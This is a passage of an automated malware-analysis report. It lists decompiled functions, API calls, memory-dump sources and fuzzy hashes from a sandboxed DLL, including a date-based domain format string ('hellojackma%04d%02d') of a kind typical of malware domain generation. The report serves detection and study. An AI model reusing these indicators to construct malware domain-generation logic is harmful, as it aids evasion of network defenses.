                                                                                                                                                                  0x10022cc1
                                                                                                                                                                  0x10022ccc
                                                                                                                                                                  0x10022cd6

                                                                                                                                                                  APIs
                                                                                                                                                                  • _sprintf.LIBCMT ref: 10022BD1
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .com/$hellojackma%04d%02d5
                                                                                                                                                                  • API String ID: 2531412260-1062581820
                                                                                                                                                                  • Opcode ID: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
                                                                                                                                                                  • Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
                                                                                                                                                                  • Opcode Fuzzy Hash: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
                                                                                                                                                                  • Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000443C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F06B(E10022FB8, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001DF0(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
				E1000EC4B(_t25 - 0x50, 0x10331468);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100242c8;
				return _t23;
			}








                                                                                                                                                                  0x1000443c
                                                                                                                                                                  0x1000443c
                                                                                                                                                                  0x10004443
                                                                                                                                                                  0x10004450
                                                                                                                                                                  0x10004455
                                                                                                                                                                  0x10004455
                                                                                                                                                                  0x1000445d
                                                                                                                                                                  0x10004460
                                                                                                                                                                  0x1000446e
                                                                                                                                                                  0x10004475
                                                                                                                                                                  0x1000447a
                                                                                                                                                                  0x1000447b
                                                                                                                                                                  0x10004480
                                                                                                                                                                  0x10004482
                                                                                                                                                                  0x10004487
                                                                                                                                                                  0x10004490

                                                                                                                                                                  APIs
                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10004443
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10004475
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                    • Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73
                                                                                                                                                                  Strings
                                                                                                                                                                  • invalid string position, xrefs: 10004448
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                  • API String ID: 2977319401-1799206989
                                                                                                                                                                  • Opcode ID: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction ID: e86674a8940bf3c69d49669cad452c3bb0f00751fa4d3b8ebb3f475700820a46
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction Fuzzy Hash: D5E06DB5500168EBD704DBD4EC41ADEB778EF44391FC2092AF244A7149CF75A909CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%